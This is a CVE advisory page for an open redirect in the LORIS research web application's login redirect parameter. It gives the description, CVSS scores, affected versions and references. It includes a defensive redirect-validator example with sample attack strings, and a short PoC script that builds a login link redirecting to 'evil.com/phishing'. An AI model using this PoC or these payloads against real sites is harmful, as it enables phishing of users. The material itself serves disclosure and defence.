Security Vulnerability Report
CVE-2026-39985 CVSS 4.3 MEDIUM

CVE-2026-39985

Published: 2026-04-09 18:17:03
Last Modified: 2026-04-22 00:24:35

Description

LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. Prior to 27.0.3 and 28.0.1, the redirect parameter upon login to LORIS was not validating the value of the redirect as being within LORIS, which could be used to trick users into visiting arbitrary URLs if they are given a link with a third party redirect parameter. This vulnerability is fixed in 27.0.3 and 28.0.1.
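The validation the advisory describes as missing, confining the post-login redirect to LORIS itself, as an added example that is not LORIS project code (the base URL and function names are assumptions). It goes slightly beyond the advisory's own case by covering the protocol-relative and backslash forms a validator must also reject.

```python
# Added example (not LORIS project code): the "redirect must be within LORIS"
# check that CVE-2026-39985 says the login flow lacked. Base URL and function
# names are assumptions for illustration, not the project's own.
from urllib.parse import urlsplit, urljoin

LORIS_BASE = "https://loris.example.org/"  # constructed base URL for this example


def is_safe_redirect(redirect, base=LORIS_BASE):
    """True only if `redirect` stays on the same scheme and host as `base`."""
    if not isinstance(redirect, str) or not redirect:
        return False
    # Browsers strip tab/newline and tolerate control characters; refuse them.
    if any(c.isspace() or ord(c) < 0x20 for c in redirect):
        return False
    # Browsers treat "\" as "/" in URLs, so "\\evil.com" is really "//evil.com".
    candidate = redirect.replace("\\", "/")
    base_parts = urlsplit(base)
    parts = urlsplit(candidate)
    if parts.scheme:
        # Absolute URL: scheme and the whole authority (userinfo, host, port) must
        # match. This also rejects "https:///evil.com", whose netloc parses as
        # empty here but which browsers resolve to evil.com.
        return (parts.scheme == base_parts.scheme
                and parts.netloc.lower() == base_parts.netloc.lower())
    # No scheme: allow only path-relative targets. Anything starting with "//"
    # (including "///evil.com", which browsers read as a host) is protocol-relative.
    if parts.netloc or candidate.startswith("//"):
        return False
    return True


def resolve_redirect(redirect, base=LORIS_BASE, default="/"):
    """Absolute URL to send the user to after login: the requested target if it
    passed validation, otherwise the application's own landing page."""
    if is_safe_redirect(redirect, base):
        return urljoin(base, redirect.replace("\\", "/"))
    return urljoin(base, default)


if __name__ == "__main__":
    # Constructed sample redirect values, including the attack shape from the advisory.
    for value in ["/main.php?test_name=x", "http://evil.com/phishing", "//evil.com",
                  "///evil.com", "\\\\evil.com", "https://loris.example.org@evil.com/",
                  "javascript:alert(1)", "https://loris.example.org/dashboard"]:
        print(f"{value!r:45} -> {resolve_redirect(value)}")
```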

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mcgill:loris:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mcgill:loris:28.0.0:*:*:*:*:*:*:* - VULNERABLE
LORIS < 27.0.3
LORIS >= 28.0.0, < 28.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept (PoC) for CVE-2026-39985
# Description: Exploits the open redirect vulnerability via the login redirect parameter.
import urllib.parse


def generate_malicious_url(base_url, evil_site):
    """
    Generates a malicious LORIS login URL that redirects to an external site.
    """
    # The vulnerable parameter is 'redirect'
    payload = {'redirect': evil_site}
    # Encode the parameters
    query_string = urllib.parse.urlencode(payload)
    # Construct the full URL
    malicious_url = f"{base_url}?{query_string}"
    return malicious_url


if __name__ == "__main__":
    target = "https://example-loris-instance.com/login"
    redirect_target = "http://evil.com/phishing"
    poc_url = generate_malicious_url(target, redirect_target)
    print(f"[+] Generated Malicious URL: {poc_url}")
    print(f"[+] Victim will be redirected to: {redirect_target}")

References

(as listed in the raw NVD record below)
Patch: https://github.com/aces/Loris/commit/f57f54b42a076bf53ba86e20d4dbf37f63538f58
Release Notes: https://github.com/aces/Loris/releases/tag/v27.0.3
Release Notes: https://github.com/aces/Loris/releases/tag/v28.0.1
Vendor Advisory: https://github.com/aces/Loris/security/advisories/GHSA-rch2-f5fw-cg95

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39985", "sourceIdentifier": "[email protected]", "published": "2026-04-09T18:17:02.653", "lastModified": "2026-04-22T00:24:34.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. Prior to 27.0.3 and 28.0.1, the redirect parameter upon login to LORIS was not validating the value of the redirect as being within LORIS, which could be used to trick users into visiting arbitrary URLs if they are given a link with a third party redirect parameter. This vulnerability is fixed in 27.0.3 and 28.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mcgill:loris:*:*:*:*:*:*:*:*", "versionEndExcluding": "27.0.3", 
"matchCriteriaId": "F04A492D-D20B-4349-B01E-18EC44C8E400"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mcgill:loris:28.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D358B66A-04AC-44F2-8EF6-4332D8AC00F4"}]}]}], "references": [{"url": "https://github.com/aces/Loris/commit/f57f54b42a076bf53ba86e20d4dbf37f63538f58", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/aces/Loris/releases/tag/v27.0.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/aces/Loris/releases/tag/v28.0.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/aces/Loris/security/advisories/GHSA-rch2-f5fw-cg95", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}